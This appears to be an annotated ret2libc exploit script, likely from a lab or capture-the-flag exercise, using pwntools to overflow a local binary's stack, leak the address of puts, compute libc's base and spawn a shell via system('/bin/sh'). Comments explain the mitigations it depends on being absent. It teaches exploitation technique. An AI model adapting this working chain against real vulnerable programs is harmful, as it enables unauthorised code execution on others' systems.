"""Two-stage ret2libc walkthrough against the local binary ./vuln4 (pwntools, Python 2).

Stage 1 returns into puts@plt with puts@got as the argument so the process
prints the runtime address of puts, then returns to main for a second input.
Stage 2 uses that leak to compute libc's base and calls system("/bin/sh").

From a defender's view the script only works because of the absence of the
usual mitigations it implicitly relies on: the chain uses fixed, non-PIE
addresses (main is hard-coded below), a writable/readable GOT lookup, and a
stack overwrite with no canary in the way. PIE, stack protectors and full
RELRO each break a step of this; the leak itself shows up as a puts() call
whose output is raw pointer bytes rather than text.
"""
from pwn import *
# Spawn the target locally; everything below talks to this process.
s = process("./vuln4")
# The libc the target will load; symbol offsets below are taken from it.
libc = ELF("./libc")
elf = ELF("./vuln4")
# Synchronise on the binary's prompt before sending the first payload.
s.recvuntil("You should find puts yourself")
puts_plt = elf.plt['puts']
# NOTE(review): puts_got is computed here but the payload on the line
# "pay += p32(elf.got['puts'])" re-reads the GOT entry instead of using it.
puts_got = elf.got['puts']
# NOTE(review): bss is never used in this script (leftover from an earlier variant?).
bss = elf.bss()+0x50
# Hard-coded 32-bit address of main — only valid for a non-PIE build; a
# PIE/ASLR'd build would make this (and the whole stage-1 chain) fail.
main = 0x080484EA
# 22 bytes of filler reach the saved return address for this binary;
# the offset is specific to ./vuln4's stack frame (no canary in between).
pay = "A"*22
# Stage 1 chain: puts(puts@got) -> return to main.  puts prints the
# resolved libc address of puts, and returning to main gives a second
# vulnerable read for stage 2.
pay += p32(puts_plt)
pay += p32(main)
pay += p32(elf.got['puts'])
# Debug leftover: attaches gdb to the process before the payload is sent
# (will stall or fail where gdb/a terminal is unavailable).
gdb.attach(s)
s.sendline(pay)
# Discard the rest of the current line, then read the 4 leaked address bytes
# (little-endian, as puts writes the GOT entry out verbatim).
s.recvline()
puts_libc = u32(s.recv(4))
print "puts libc : " + hex(puts_libc)
# Rebase: runtime address minus the symbol's offset inside ./libc.
libc_base = puts_libc - libc.symbols['puts']
system = libc_base + libc.symbols['system']
# Locate a "/bin/sh" string inside libc itself (NUL-terminated search).
bin_sh = libc_base + next(libc.search("/bin/sh\0"))
print "libc_base : " + hex(libc_base)
print "system : " + hex(system)
print "bin_sh : " + hex(bin_sh)
# Stage 2: main has re-run, wait for the same prompt again.
s.recvuntil("You should find puts yourself")
pay = "A"*22
# system(bin_sh) with "AAAA" as the (never used) return address for system.
pay += p32(system)
pay += "AAAA"
pay += p32(bin_sh)
s.sendline(pay)
# Hand the I/O over to the user.
s.interactive()